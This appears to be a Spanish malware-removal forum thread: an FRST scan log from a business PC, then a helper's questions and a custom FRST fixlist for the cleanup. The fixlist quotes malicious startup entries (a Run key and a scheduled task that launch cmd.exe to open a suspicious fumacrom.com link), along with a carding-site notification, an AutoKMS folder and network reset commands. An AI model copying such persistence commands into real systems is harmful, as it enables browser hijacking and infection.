2021-12-30 08:52 - 2021-12-30 08:52 - 000192952 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2021-12-30 08:51 - 2021-12-30 08:52 - 014178840 _____ (Malwarebytes Corp.) C:\Users\Spices\Downloads\mbar-1.10.3.1001.exe
2021-12-30 08:18 - 2021-12-30 08:22 - 000000000 ____D C:\ProgramData\HitmanPro
2021-12-30 08:17 - 2021-12-30 08:18 - 014609344 _____ (SurfRight B.V.) C:\Users\Spices\Downloads\HitmanPro_x64.exe
2021-12-29 14:36 - 2021-12-29 14:36 - 000070092 _____ C:\Users\Spices\Downloads\PO#680922 INV#5509 OK Empaque.pdf
2021-12-29 14:36 - 2021-12-29 14:36 - 000059295 _____ C:\Users\Spices\Downloads\BL#5508 El Monte Empaque.pdf
2021-12-29 12:41 - 2021-12-29 12:41 - 000217357 _____ C:\Users\Spices\Downloads\ELMONTE.pdf
2021-12-29 11:06 - 2021-12-29 11:06 - 000010774 _____ C:\Users\Spices\Downloads\Invoice_INV12082_1640715334067.pdf
2021-12-29 09:03 - 2021-12-29 09:03 - 000005670 _____ C:\Users\Spices\Downloads\PO537837.xlsx
2021-12-27 12:20 - 2021-12-27 12:20 - 000037493 _____ C:\Users\Spices\Downloads\trk1080567621.pdf
2021-12-27 12:16 - 2021-12-27 12:16 - 000120945 _____ C:\Users\Spices\Downloads\Inv_72980_from_Superior_Packaging_Solutions_Inc._19336.pdf
2021-12-27 09:34 - 2021-12-27 09:34 - 000043388 _____ C:\Users\Spices\Downloads\Report_from_REHAN_SPICES_CORP (6).pdf
2021-12-27 09:31 - 2021-12-27 09:32 - 000074620 _____ C:\Users\Spices\Downloads\Inv_31967_from_REHAN_SPICES_CORP_3800 (1).pdf
2021-12-27 09:02 - 2021-12-27 09:02 - 000002326 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-12-27 09:02 - 2021-12-27 09:02 - 000002285 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-12-27 09:01 - 2021-12-27 09:01 - 001341272 _____ (Google LLC) C:\Users\Spices\Downloads\ChromeSetup.exe
2021-12-27 07:34 - 2021-12-27 09:00 - 000000000 ____D C:\ProgramData\Mozilla
2021-12-27 07:34 - 2021-12-27 09:00 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-12-27 07:34 - 2021-12-27 08:37 - 000000000 ____D C:\Users\Spices\AppData\LocalLow\Mozilla
2021-12-27 07:34 - 2021-12-27 07:34 - 000333824 _____ (Mozilla) C:\Users\Spices\Downloads\Firefox Installer.exe
2021-12-27 07:34 - 2021-12-27 07:34 - 000000000 ____D C:\Users\Spices\AppData\Roaming\Mozilla
2021-12-27 07:34 - 2021-12-27 07:34 - 000000000 ____D C:\Users\Spices\AppData\Local\Mozilla
2021-12-24 11:42 - 2021-12-24 11:42 - 000092727 _____ C:\Users\Spices\Downloads\elmo 0231188.pdf
2021-12-24 11:42 - 2021-12-24 11:42 - 000091973 _____ C:\Users\Spices\Downloads\elmo 0231189.pdf
2021-12-24 11:41 - 2021-12-24 11:41 - 000178398 _____ C:\Users\Spices\Downloads\archive.zip
2021-12-23 11:37 - 2021-12-23 11:37 - 000143469 _____ C:\Users\Spices\Downloads\179Purchase Orders (4).pdf
2021-12-23 11:14 - 2021-12-23 11:14 - 000040389 _____ C:\Users\Spices\Downloads\4382_001.pdf
2021-12-23 08:12 - 2021-12-23 08:12 - 002105837 _____ C:\Users\Spices\Downloads\CUSMA EL MONTE DEC 22-2021-25603.pdf
2021-12-23 07:53 - 2021-12-23 07:53 - 000029408 _____ C:\Users\Spices\Downloads\po_lspo (27).pdf
2021-12-23 07:51 - 2021-12-23 07:51 - 000003251 _____ C:\Users\Spices\Downloads\34980668.pdf
2021-12-22 07:51 - 2021-12-14 07:44 - 000381456 _____ (Google, Inc.) C:\WINDOWS\system32\Drivers\googledrivefs3688.sys
2021-12-21 09:28 - 2021-12-21 09:28 - 000075524 _____ C:\Users\Spices\Downloads\MyFDA_Compliance_Status_Report (1).pdf
2021-12-21 08:10 - 2021-12-21 08:10 - 000000000 ____D C:\Users\Spices\Doctor Web
2021-12-21 08:09 - 2021-12-21 08:10 - 263216616 _____ C:\Users\Spices\Downloads\or80g9pk.exe
2021-12-20 10:39 - 2021-12-20 10:39 - 000142838 _____ C:\Users\Spices\Downloads\179Purchase Orders (1) (1).pdf
2021-12-20 07:59 - 2021-12-20 07:59 - 000044213 _____ C:\Users\Spices\Downloads\4178_001.pdf
2021-12-17 10:45 - 2021-12-17 10:45 - 000078402 _____ C:\Users\Spices\Downloads\INV#5500 El Monte Spices.pdf
2021-12-17 09:52 - 2021-12-17 09:52 - 000005669 _____ C:\Users\Spices\Downloads\PO536024.xlsx
2021-12-17 09:50 - 2021-12-17 09:50 - 000003222 _____ C:\Users\Spices\Downloads\34960113.pdf
2021-12-17 09:36 - 2021-12-17 09:36 - 000003862 _____ C:\WINDOWS\system32\Tasks\EOSv3 Scheduler onLogOn
2021-12-17 09:36 - 2021-12-17 09:36 - 000003420 _____ C:\WINDOWS\system32\Tasks\EOSv3 Scheduler onTime
2021-12-17 08:30 - 2021-12-17 08:31 - 000001430 _____ C:\Users\Spices\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ESET Online Scanner.lnk
2021-12-17 08:30 - 2021-12-17 08:30 - 013311448 _____ (ESET) C:\Users\Spices\Downloads\esetonlinescanner.exe
2021-12-16 12:20 - 2021-12-16 12:20 - 000420919 _____ C:\Users\Spices\Downloads\EL MONTE INV # 8348 PO# 2729.pdf
2021-12-16 12:20 - 2021-12-16 12:20 - 000386913 _____ C:\Users\Spices\Downloads\EL MONTE INV # 8357 PO# 2279.pdf
2021-12-16 12:18 - 2021-12-16 12:18 - 000035717 _____ C:\Users\Spices\Downloads\po_lspo (26).pdf
2021-12-16 08:40 - 2021-12-16 08:40 - 000000000 ____D C:\WINDOWS\AutoKMS
2021-12-16 08:15 - 2021-12-16 08:15 - 003291800 _____ (Nicolas Coolman) C:\Users\Spices\Downloads\ZHPCleaner.exe
2021-12-16 08:12 - 2021-12-16 08:13 - 000000000 ____D C:\AdwCleaner
2021-12-16 08:11 - 2021-12-16 08:11 - 008540344 _____ (Malwarebytes) C:\Users\Spices\Downloads\adwcleaner_8.3.1.exe
2021-12-15 11:31 - 2021-12-15 11:31 - 000148659 _____ C:\Users\Spices\Downloads\420560 (1).pdf
2021-12-15 11:24 - 2021-12-15 11:24 - 000191516 _____ C:\Users\Spices\Downloads\Certificate_124.pdf
2021-12-15 10:33 - 2021-12-15 10:33 - 000017100 _____ C:\Users\Spices\Downloads\po_lspo (25).pdf
2021-12-15 09:16 - 2021-12-15 09:16 - 000240391 _____ C:\Users\Spices\Downloads\277486680007_CT.pdf
2021-12-15 09:16 - 2021-12-15 09:16 - 000172338 _____ C:\Users\Spices\Downloads\277486680007_FSV.pdf
2021-12-15 09:16 - 2021-12-15 09:16 - 000150024 _____ C:\Users\Spices\Downloads\Resized_Resized_20211215_065921(1).jpeg
2021-12-15 09:03 - 2021-12-15 09:03 - 000610756 _____ C:\Users\Spices\Downloads\8348.pdf
2021-12-15 08:30 - 2021-12-15 08:30 - 000934103 _____ C:\Users\Spices\Downloads\12-8-21 INVOICE# 9670.pdf
2021-12-15 08:14 - 2021-12-15 08:14 - 000000000 ____D C:\WINDOWS\SystemTemp
2021-12-15 05:31 - 2021-12-15 05:31 - 000223744 _____ C:\WINDOWS\SysWOW64\TpmTool.exe
2021-12-15 05:31 - 2021-12-15 05:31 - 000011979 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-12-15 05:30 - 2021-12-15 05:30 - 000272384 _____ C:\WINDOWS\system32\TpmTool.exe
2021-12-15 05:30 - 2021-12-15 05:30 - 000162816 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-12-15 05:22 - 2021-12-15 05:22 - 000000000 ___HD C:\$WinREAgent
2021-12-14 15:19 - 2021-12-14 15:19 - 000612556 _____ C:\Users\Spices\Downloads\8272 (1).pdf
2021-12-14 14:38 - 2021-12-14 14:38 - 000011060 _____ C:\Users\Spices\Downloads\Invoice_INV11832_1639510103249.pdf
2021-12-14 10:01 - 2021-12-14 10:01 - 000000000 ____D C:\Users\Spices\Documents\QBBackupTemp Tue, Dec 14 2021 10 01 00 AM
2021-12-14 07:55 - 2021-12-14 07:55 - 000005670 _____ C:\Users\Spices\Downloads\PO535511.xlsx
2021-12-13 21:51 - 2021-12-13 21:51 - 000003592 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1001776605-1151265979-3107129937-1001
2021-12-13 17:07 - 2021-12-13 17:07 - 000092388 _____ C:\Users\Spices\Downloads\elmo 0230901.pdf
2021-12-13 16:46 - 2021-12-13 16:46 - 000065834 _____ C:\Users\Spices\Downloads\Purchase  Order_19135_20211213_34800PM.pdf
2021-12-13 10:57 - 2021-12-13 10:57 - 000554654 _____ C:\Users\Spices\Downloads\invoice_elmontespices_.pdf
2021-12-13 09:47 - 2021-12-13 09:47 - 000148659 _____ C:\Users\Spices\Downloads\420560.pdf
2021-12-13 09:43 - 2021-12-13 09:44 - 000012951 _____ C:\Users\Spices\Downloads\El Monte - SO9604.pdf
2021-12-13 09:07 - 2021-12-13 09:07 - 000003253 _____ C:\Users\Spices\Downloads\34943559.pdf
2021-12-13 08:03 - 2021-12-16 08:40 - 000000000 ____D C:\Users\Spices\AppData\Roaming\ZHP
2021-12-13 08:03 - 2021-12-13 08:03 - 000000000 ____D C:\Users\Spices\AppData\Local\ZHP
2021-12-10 16:24 - 2021-12-10 16:24 - 000037294 _____ C:\Users\Spices\Downloads\po_lspo (24).pdf
2021-12-10 15:36 - 2021-12-10 15:36 - 000892261 _____ C:\Users\Spices\Downloads\11-10-21 invoice# 9526.pdf
2021-12-10 15:35 - 2021-12-10 15:35 - 004690510 _____ C:\Users\Spices\Downloads\11-9-21 invoice# 9550.pdf
2021-12-10 13:23 - 2021-12-10 13:23 - 000070057 _____ C:\Users\Spices\Downloads\Inv_32092_from_REHAN_SPICES_CORP_15692.pdf
2021-12-10 10:40 - 2021-12-10 10:40 - 000011033 _____ C:\Users\Spices\Downloads\Invoice_INV11665_1638922579023 (1).pdf
2021-12-10 08:23 - 2021-12-10 08:23 - 000001507 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2021-12-10 08:23 - 2021-12-10 08:23 - 000000000 ____D C:\WINDOWS\system32\Tasks\Safer-Networking
2021-12-10 08:23 - 2021-12-10 08:23 - 000000000 ____D C:\Users\Spices\AppData\Local\Safer-Networking Ltd
2021-12-10 08:23 - 2021-12-10 08:23 - 000000000 ____D C:\Safer-Networking Ltd
2021-12-10 08:23 - 2021-12-10 08:23 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2021-12-10 08:23 - 2019-06-21 08:34 - 000019904 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\system32\Drivers\Spybot3ELAM.sys
2021-12-10 08:22 - 2021-12-10 08:50 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2021-12-10 08:22 - 2021-12-10 08:24 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2021-12-10 08:22 - 2018-02-06 19:04 - 000032168 _____ (Safer-Networking Ltd.) C:\WINDOWS\system32\sdnclean64.exe
2021-12-10 08:20 - 2021-12-10 08:21 - 069300040 _____ (Safer-Networking Ltd. ) C:\Users\Spices\Downloads\spybotsd-2.8.68.0.exe
2021-12-10 08:15 - 2021-12-10 08:15 - 000248992 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2021-12-10 08:15 - 2021-12-10 08:15 - 000160176 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2021-12-10 08:15 - 2021-12-10 08:15 - 000002036 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2021-12-10 08:15 - 2021-12-10 08:14 - 000019912 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys
2021-12-10 08:14 - 2021-12-30 08:53 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-12-10 08:14 - 2021-12-10 08:14 - 002101944 _____ (Malwarebytes) C:\Users\Spices\Downloads\MBSetup-119967.119967-consumer.exe
2021-12-10 08:14 - 2021-12-10 08:14 - 000000000 ____D C:\Program Files\Malwarebytes
2021-12-10 07:59 - 2021-12-17 08:30 - 000000000 ____D C:\Users\Spices\AppData\Local\ESET
2021-12-09 17:00 - 2021-12-09 17:00 - 000074620 _____ C:\Users\Spices\Downloads\Inv_31967_from_REHAN_SPICES_CORP_3800.pdf
2021-12-08 09:01 - 2021-12-08 09:01 - 000000000 ____D C:\Users\Spices\Documents\QBBackupTemp Wed, Dec 08 2021 09 01 00 AM
2021-12-07 18:36 - 2021-12-07 18:36 - 000011033 _____ C:\Users\Spices\Downloads\Invoice_INV11665_1638922579023.pdf
2021-12-07 17:21 - 2021-12-07 17:21 - 000560882 _____ C:\Users\Spices\Downloads\el monte inv.12.07.21.pdf
2021-12-07 14:36 - 2021-12-07 14:36 - 001084748 _____ C:\Users\Spices\Downloads\11-23-21  INVOICE# 9586.pdf
2021-12-07 14:36 - 2021-12-07 14:36 - 001050748 _____ C:\Users\Spices\Downloads\12-1-21  INVOICE# 9640.pdf
2021-12-07 14:36 - 2021-12-07 14:36 - 001050748 _____ C:\Users\Spices\Downloads\12-1-21  INVOICE# 9640 (1).pdf
2021-12-07 11:15 - 2021-12-07 11:15 - 000004757 _____ C:\Users\Spices\Downloads\EL MONTE SPICE INS ID CARD.pdf

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2022-01-06 08:34 - 2018-03-02 15:37 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2022-01-06 08:31 - 2019-12-07 01:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-01-06 08:24 - 2018-03-01 16:53 - 000000000 ____D C:\Program Files (x86)\Google
2022-01-06 07:52 - 2021-02-12 13:37 - 000000000 ____D C:\Program Files\CCleaner
2022-01-06 07:50 - 2020-11-13 09:16 - 000004170 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{30F58647-5ECA-4353-8E34-097FB582709F}
2022-01-06 07:47 - 2018-03-02 16:54 - 196280320 ____R C:\Users\Spices\Documents\EL MONTE ESPICES17 5-26-17.QBW.TLG
2022-01-06 07:47 - 2018-03-02 16:54 - 130564096 ____R C:\Users\Spices\Documents\EL MONTE ESPICES17 5-26-17.QBW
2022-01-05 17:12 - 2020-11-13 08:39 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-01-05 17:01 - 2020-04-24 09:46 - 000000000 ____D C:\Users\Spices\Documents\EL MONTE ESPICES17 5-26-17.QBW.SearchIndex
2022-01-05 11:01 - 2019-06-05 16:29 - 000000000 ____D C:\Users\Spices\Documents\QuickBooksAutoDataRecovery
2022-01-05 10:11 - 2019-06-05 16:29 - 000000391 _____ C:\Users\Spices\Documents\EL MONTE ESPICES17 5-26-17.QBW.DSN
2022-01-05 10:11 - 2018-11-21 21:45 - 000000434 _____ C:\Users\Spices\Documents\EL MONTE ESPICES17 5-26-17.QBW.ND
2022-01-05 09:24 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-01-04 09:36 - 2020-09-28 08:53 - 000000000 ____D C:\Users\Spices\Documents\DOC GENERALES
2022-01-03 10:47 - 2018-03-01 16:20 - 000000000 ____D C:\Users\Spices\AppData\Local\Packages
2021-12-30 10:07 - 2020-09-28 08:53 - 000161972 _____ C:\Users\Spices\Documents\DOCUMENTOS GENERALES.zip
2021-12-30 09:43 - 2020-11-13 08:57 - 000840602 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-12-30 09:43 - 2019-12-07 01:13 - 000000000 ____D C:\WINDOWS\INF
2021-12-30 09:36 - 2020-11-13 09:16 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-12-30 09:36 - 2020-11-13 08:38 - 000008192 ___SH C:\DumpStack.log.tmp
2021-12-30 09:28 - 2019-12-07 01:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2021-12-27 16:02 - 2018-07-04 13:58 - 000000000 ____D C:\Users\Spices\AppData\Local\CrashDumps
2021-12-27 09:02 - 2018-05-14 20:05 - 000000000 ____D C:\Users\Spices\AppData\Local\Google
2021-12-27 09:02 - 2018-03-23 02:00 - 000000000 ____D C:\Program Files\Google
2021-12-27 09:00 - 2020-07-15 16:46 - 000002395 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2021-12-27 07:36 - 2020-07-15 16:46 - 000002557 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-12-22 07:56 - 2019-12-07 01:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-12-22 07:51 - 2021-09-01 09:55 - 000002060 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive.lnk
2021-12-22 07:51 - 2021-09-01 09:55 - 000001902 _____ C:\Users\Default\Desktop\Google Slides.lnk
2021-12-22 07:51 - 2021-09-01 09:55 - 000001902 _____ C:\Users\Default\Desktop\Google Sheets.lnk
2021-12-22 07:51 - 2021-09-01 09:55 - 000001890 _____ C:\Users\Default\Desktop\Google Docs.lnk
2021-12-21 08:27 - 2020-11-13 08:44 - 000000000 ____D C:\Users\Spices
2021-12-20 08:01 - 2018-03-01 17:16 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2021-12-17 09:39 - 2020-11-13 08:44 - 000000000 ____D C:\Users\QBDataServiceUser27
2021-12-17 08:37 - 2021-03-08 07:19 - 000000000 ____D C:\Program Files (x86)\CCleaner Browser
2021-12-15 09:39 - 2021-05-08 06:24 - 000000000 ____D C:\Program Files\HPPrintScanDoctor
2021-12-15 08:23 - 2020-12-07 07:07 - 000635136 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-12-15 08:14 - 2019-12-07 01:54 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\system32\lv-LV
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\system32\lt-LT
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\system32\et-EE
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-12-15 05:33 - 2019-12-07 01:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-12-15 05:17 - 2018-03-01 17:33 - 137938848 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-12-15 05:17 - 2018-03-01 17:33 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-12-13 07:53 - 2020-11-30 01:10 - 000003386 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d6b9ddce3298dc
2021-12-13 07:53 - 2020-11-13 09:16 - 000003480 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-12-10 09:32 - 2019-12-07 01:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2021-12-10 08:26 - 2020-11-13 09:36 - 000000000 ____D C:\Users\TEMP.DESKTOP-RLQ6923.004
2021-12-10 08:26 - 2020-11-13 09:35 - 000000000 ____D C:\Users\TEMP.DESKTOP-RLQ6923.003
2021-12-10 08:26 - 2020-11-13 09:24 - 000000000 ____D C:\Users\TEMP.DESKTOP-RLQ6923.002
2021-12-10 08:26 - 2020-11-13 09:22 - 000000000 ____D C:\Users\TEMP.DESKTOP-RLQ6923.001
2021-12-10 08:26 - 2020-11-13 09:20 - 000000000 ____D C:\Users\TEMP.DESKTOP-RLQ6923.000
2021-12-10 08:26 - 2020-11-13 09:20 - 000000000 ____D C:\Users\TEMP.DESKTOP-RLQ6923
2021-12-10 08:26 - 2020-11-13 09:19 - 000000000 ____D C:\Users\TEMP
2021-12-10 08:15 - 2019-12-07 01:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-12-10 07:51 - 2018-03-02 15:37 - 000000000 ____D C:\Users\Spices\AppData\Roaming\TeamViewer
2021-12-07 03:13 - 2018-05-14 20:25 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd

==================== Files in the root of some directories ========

2019-06-24 19:37 - 2019-06-26 22:18 - 000000000 _____ () C:\Users\Spices\AppData\Roaming\MCVi2UserDetail.ini
2018-11-21 21:42 - 2021-06-03 17:22 - 000269070 _____ () C:\Users\Spices\AppData\Roaming\QBFileDrTool_DESKTOP-RLQ6923.log

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

Muchas gracias por tu ayuda y por el seguimiento, ahi estan los reportes, Estare pendiente! Saludos!

Hola buenas lo estoy mirando.

En breves lo tienes @hectordj69

Salu2.

Hola buenas @hectordj69 ya estoy aquí, por fin…

Bien , pues sigamos…

PREGUNTAS

¿Qué antivirus utilizas a día de hoy en la máquina?

Veo que hay restos de AVAST y McAfee. También tienes AVG, Windows Defender, ESET y Spybot - Search and Destroy. Cuéntame más acerca de todo esto.

¿Reconoces estas cuentas de users en la máquina? Estas son:

QBDataServiceUser27 (S-1-5-21-1001776605-1151265979-3107129937-1002 - Limited - Enabled) => C:\Users\TEMP.DESKTOP-RLQ6923.005
Spices (S-1-5-21-1001776605-1151265979-3107129937-1001 - Administrator - Enabled) => C:\Users\Spices

¿Reconoces estos programas en la máquina? ¿Los has instalado tu? Estos son:

DesignPro 5.4 Limited Edition (HKLM-x32\...\InstallShield_{71F6DF7D-B639-4FAD-BA93-E6DF267AA44D}) (Version: 5.2.1201 - Avery Dennison)
JeRM Process Viewer 1.1.0.3 (HKLM-x32\...\JeRM Process Viewer_is1) (Version:  - )
MSRX (HKLM-x32\...\MSRXv2017) (Version: v2017 - )
RepairSolutions (HKLM-x32\...\{94FA6651-E735-48D4-950A-93291C14DB63}) (Version: 3.0.19 - Innova Electronics)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.8.68.0 - Safer-Networking Ltd.)
Winmail Reader 1.2.15 (HKLM-x32\...\Winmail Reader_is1) (Version:  - Kopf)
JAR File Opener -> C:\Program Files\WindowsApps\62307pauljohn.JARFileOpener_1.2.0.0_neutral__7sv5v3m8wq0b2 [2018-04-16] (pauljohn)

Ahora debes de hacer una COPIA DE SEGURIDAD DEL REGISTRO, para ello:

• Reinicias el ordenador en Modo Normal.

• Descargas DelFix en tu escritorio.

• Doble clic para ejecutarlo. (Si usas Windows Vista/7/8 o 10 presiona clic derecho y selecciona - Ejecutar como Administrador)

• Marcas solamente la casilla de Create registry backup, el resto te aseguras de que no estén seleccionadas.

• Presionas en Run.

Se abrirá el informe (DelFix.txt), puedes cerrarlo. Pero lo guardas por si en el futuro te lo pido/hace falta.

Seguidamente, CIERRAS TODOS LOS PROGRAMAS, vas a Inicio >> Ejecutar y escribes Notepad.exe

• Ahora debes copiar y pegar los códigos/líneas que están en el interior del recuadro de más abajo, dentro del Notepad.

START
SystemRestore: On
CREATERESTOREPOINT:
CLOSEPROCESSES:
Folder: C:\program files\avast software\avast
Folder: C:\WINDOWS\AutoKMS
Folder: C:\Program Files\Common Files\AV\
Folder: C:\Program Files\Common Files\McAfee
Folder: C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{30F58647-5ECA-4353-8E34-097FB582709F}
File: C:\Users\Spices\Downloads\or80g9pk.exe

HKLM\...\Run: [HotKeysCmds] => "C:\WINDOWS\system32\hkcmd.exe" (No File)
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\Run: [prueba] => C:\Windows\System32\cmd.exe /c start hxxp://fumacrom.com/2OEsQ & start chrome.exe hxxp://fumacrom.com/2OEsQ & exit
BootExecute: autocheck autochk * sdnclean64.exe
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {0C42F339-DE3B-4B39-9229-AD7686DAE33C} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe /prepare (No File)
Task: {3C9BEDBE-D3A6-446B-AAED-540A66B14AD2} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe /platui /runkey (No File)
Task: {A559BF25-2AD5-4E2C-A24F-6C68836C60B9} - System32\Tasks\TAREAAA => C:\Windows\System32\cmd.exe /c start http://fumacrom.com/2OEsQ & start chrome.exe http://fumacrom.com/2OEsQ & exit <==== ATTENTION
Edge Notifications: HKU\S-1-5-21-1001776605-1151265979-3107129937-1001 -> hxxps://www.cvvshop.lv; hxxps://mail.google.com
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
AlternateDataStreams: C:\Users\Spices\Documents\para norma.jpeg:3or4kl4x13tuuug3Byamue2s4b [105]
AlternateDataStreams: C:\Users\Spices\Documents\para norma.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Spices\Documents\tapiascan.jpeg:3or4kl4x13tuuug3Byamue2s4b [105]
AlternateDataStreams: C:\Users\Spices\Documents\tapiascan.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\98963565.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\98963565.sys => ""="Driver"
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\StartupApproved\Run: => "prueba"
FirewallRules: [{CFF24E33-06E2-417A-ADE7-E746B0359CBB}] => (Allow) LPort=5357
FirewallRules: [TCP Query User{324995A9-4E1D-4924-9EED-3526411D4278}C:\program files\avast software\avast\avastui.exe] => (Block) C:\program files\avast software\avast\avastui.exe => No File
FirewallRules: [UDP Query User{01061E88-0E48-41BF-BFF0-4645F1032548}C:\program files\avast software\avast\avastui.exe] => (Block) C:\program files\avast software\avast\avastui.exe => No File
C:\program files\avast software\avast
C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe
2021-12-16 08:40 - 2021-12-16 08:40 - 000000000 ____D C:\WINDOWS\AutoKMS
2021-12-15 05:22 - 2021-12-15 05:22 - 000000000 ___HD C:\$WinREAgent

CMD: ipconfig /flushdns
CMD: ipconfig /renew
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
RemoveProxy:
EmptyTemp:
Hosts:
END

Lo guardas con el nombre de FIXLIST.TXT en tu escritorio (MUY IMPORTANTE). Pues en caso contrario no funcionará el SCRIPT, ambos ficheros (FRST.exe y FIXLIST.TXT ) y deben de estar en la ubicación del ESCRITORIO.

El anterior Script de reparación es personalizado para la máquina en concreto para la cual se fabricó y está hecho específicamente por un miembro del Staff. Si se tiene un problema parecido, por favor abra su propio tema para recibir ayuda personalizada y específica. Utilizar Scripts de otros Sistemas puede causar daños graves en su ordenador.

Finalmente (OJO, en MODO NORMAL):

1. Ejecutas nuevamente FRST.exe (Si usas Windows Vista/7/8 o 10 presiona clic derecho y selecciona - Ejecutar como Administrador).

2. Presionas sobre Fix/Corregir y esperas a que finalice el proceso. No hagas nada con el PC mientras este realizando dichas reparaciones, incluso si parece ser que se ha quedado colgado. No lo toques y esperas.

3. Cunado finalice, en el ESCRITORIO se creará el fichero FIXLOG.TXT lo traes en tu próxima respuesta.

4. Reinicias el ordenador en Modo Normal compruebas durante un rato el funcionamiento de este y comentas como sigue el problema inicialmente planteado.

Muy Importante Coloca el reporte que te he pedido como se muestra en la siguiente imagen:

report703×272 3.73 KB

Salu2.

